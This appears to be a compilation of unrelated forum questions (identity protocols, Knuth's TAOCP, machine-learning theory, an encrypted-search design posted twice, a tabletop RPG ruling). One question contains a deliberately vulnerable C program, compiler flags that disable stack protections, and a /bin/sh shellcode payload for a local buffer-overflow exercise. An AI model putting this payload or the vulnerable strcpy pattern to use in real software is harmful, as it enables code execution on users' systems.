Did not understand few things about saml and openid

In OpenID, the client needs to support OpenID Identity provider and the client (application) needs to register with OpenID Identity provider. This is similar to the service provider in SAML registering with SAML Identity provider.

In both cases, client registration is required. So, except XML data and openid (identifier, URL) I could not understand the differences between both of them other than above. Can anyone explain differences?

Are there any resources or forums online for helping me understand TAOCP?


Context

I am doing an undergrad math project that involves exploring Donald Knuth’s “TAOCP, Volume 4, fascicle 6: Satisfiability”.

I am having trouble parsing some of this material.

Surely there are some online forums where different sections are unpacked or discussed or translated into Python?

I googled this but cannot find anything that helps me.

Question

What are some online resources to help people parse TAOCP?

Surely many people have read this work before me?

64bit buffer overflow fails with SIGILL, cannot understand the reason

I have been doing 32bit buffer overflows for some time and I decided to try some 64bit overflows, to explore some more realistic scenarios. I have compiled my code with gcc -fno-stack-protector -z execstack -no-pie overflow.c -o Overflow.

Here is the code:

#include <stdio.h> #include <string.h> void function(char *str) {     char buffer[32];     strcpy(buffer,str);     puts(buffer); }  int main(int argc, char **argv) {     function(argv[1]); } 

Using gdb I determined how many bytes I need to write to control the return address. This is 40 bytes. So at first I tried to write 40bytes of “A” and then 6bytes of “B” to test the control of the return address.

Here is a screenshot: enter image description here

I found and tested a 23 byte shellcode that executes “/bin/sh”, so I try to write a nop-sled of 13 bytes, the shellcode and the first 6 bytes of the return address that need to change. So I come up with this (in gdb):

r $  (python -c'print "\x90"*13+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"\x10\xe1\xff\xff\xff\x7f"') 

I have set 2 breakpoints before and after the execution of strcpy and examine the memory.

This is the stack before the strcpy: enter image description here

where at address 0x00007fffffffe138 is the return address of function function enter image description here

And this is the stack right after the strcpy execution: enter image description here

So in my understanding, after I press c to continue the execution, I must “return” to the nopsled and then execute the shellcode in gdb.

Instead I get a SIGILL, for illegal instruction.

enter image description here

I cannot figure out why this is happening, any help/suggestions/pointer would be much appreciated.

Need to understand the security flaw?

I am creating a database of encrypted value.


Let us say I store “John” which would be encrypted and stored as “Yoky”.

John | Yoky 

Now I store “Johnny” which would be encrypted and store as “Koaddy”

John   | Yoky  Johnny | Koaddy 

Now with the above storage I will not get any kind of regex search functionality. If I wanted to search “Jo%” it will not work.

But what if I store the values after breaking them. as

Jo      |   Yoky , Koaddy Joh     |   Yoky , Koaddy John    |   Yoky , Koaddy Johnn   |   Koaddy Johnny  |   Koaddy 

Here the regex searches will work “Jo%”,”Joh%” both will give Yoky and Koaddy, which is what I want.

I can see the obvious security flaw above that anyone can map out Jo,Joh.

So I have decided to store the encryption of these.


I will AES encrypt my stubs and store them.

qkjklewr!j==      |   Yoky , Koaddy klkadsopos==      |   Yoky , Koaddy oensd%21op==      |   Yoky , Koaddy kaknvp23b02==     |   Koaddy kashdi2094j==     |   Koaddy 

While performing any type of search say, “Joh”, I will first encrypt “Joh” then perform the search, therefore it will map to the AES encrypted value of “Joh”,i.e,klkadsopos==


Note : Both the column will use different keys and algorithms to protect the data.


Note : This storage will be TDE encrypted. HDFS will be encrypted and I will be using Apache Solr for the rest.

I need to understand if I am missing something fundamental here.

Need to understand the security flaw?

I am creating a database of encrypted value.


Let us say I store “John” which would be encrypted and stored as “Yoky”.

John | Yoky 

Now I store “Johnny” which would be encrypted and store as “Koaddy”

John   | Yoky  Johnny | Koaddy 

Now with the above storage I will not get any kind of regex search functionality. If I wanted to search “Jo%” it will not work.

But what if I store the values after breaking them. as

Jo      |   Yoky , Koaddy Joh     |   Yoky , Koaddy John    |   Yoky , Koaddy Johnn   |   Koaddy Johnny  |   Koaddy 

Here the regex searches will work “Jo%”,”Joh%” both will give Yoky and Koaddy, which is what I want.

I can see the obvious security flaw above that anyone can map out Jo,Joh.

So I have decided to store the encryption of these.


I will AES encrypt my stubs and store them.

qkjklewr!j==      |   Yoky , Koaddy klkadsopos==      |   Yoky , Koaddy oensd%21op==      |   Yoky , Koaddy kaknvp23b02==     |   Koaddy kashdi2094j==     |   Koaddy 

While performing any type of search say, “Joh”, I will first encrypt “Joh” then perform the search, therefore it will map to the AES encrypted value of “Joh”,i.e,klkadsopos==


Note : Both the column will use different keys and algorithms to protect the data.


Note : This storage will be TDE encrypted.

I need to understand if I am missing something fundamental here.

I got an HCI assignment from my lecturer, and I don’t understand it

There were two assignments I’d got. The another one I could do it, but not this one( which is shown on this post). I don’t know how to give the examples for the description in the assignment by applying those 2 things( the cognitive in a reaction time task and the findings of 7(+2)) given from it. Could anyone give me for some hints or solutions? I’ve searched the information on the Google to make an apply for the answer, but it still didn’t make any sense for me. enter image description here

How can I understand the multi-class version of “shattering” intuitively?

I’m learning machine learning. VC dimension is a good way to measure the complexity of hypothesis class for binary classifier and has a very good intuitive explanation from shattering.

I know that both dimensions are based on the “shattering” concept.

When we discuss VC-dimension, shattering means $ H$ have all the behaviors on a set of size less than $ VCdim(H)$ . That is:

Let $ C=(c_1,\dots,c_d)$ be a shattered set by $ H$ . Denote the restriction of $ H$ to $ C$ by $ H_c$ . $ $ H_c = \{(h(c_1),\dots,h(c_d)):h\in H\}$ $ Then $ $ |H_c| = 2^d$ $ However, according to the definition of shattering on Page 403 of the book “Understanding Machine Learning: from theory to algorithms”(You can click the link to download the book.), the multiclass version of “shattering” is as follows:

We say a that a set $ C\subset X$ is shattered by $ H$ if there exist 2 functions $ f_0$ , $ f_1: C\to [k]$ such that

  • for every $ x\in C$ , $ f_0(x) \ne f_1(x)$ .

  • for every $ B\subset C$ , there exists a function $ h\in H$ such that

$ $ \forall x\in B, h(x)=f_0(x)\ and\ \forall x\in C \backslash B, h(x) = f_1(x)$ $

Here, $ H$ does not have all the behaviors on a set of size less than the Nagarajan dimension. That is,

$ $ |H_c| \ne k^d$ $ when $ k>2$ .

How do you understand the definition of the multiclass version of shattering, especially this point?

Does casting Tongues on the tarrasque (a language-less monstrosity) let it understand language?

Tongues description:

This spell grants the creature you touch the ability to understand any spoken language it hears. Moreover, when the target speaks, any creature that knows at least one language and can hear the target understands what it says.

It specifies that creatures hearing the target must speak at least one language, but does not specify that the target must. To me that seems like an exception that proves the rule, so I think Tongues can effectively be used like Speak With Animals, but on any one creature at a time (instead of all beasts).

Does that ruling seem consistent with other rules related to creatures that understand no languages?

This specifically came up because I’m planning a RAW-as-possible level 20 fight against the legendary tarrasque, and one of my players suggested they should cast tongues on it.


Related, but doesn’t address Tongues spell: Do either Speak with Animals or Awakened Mind let me use Command on animals?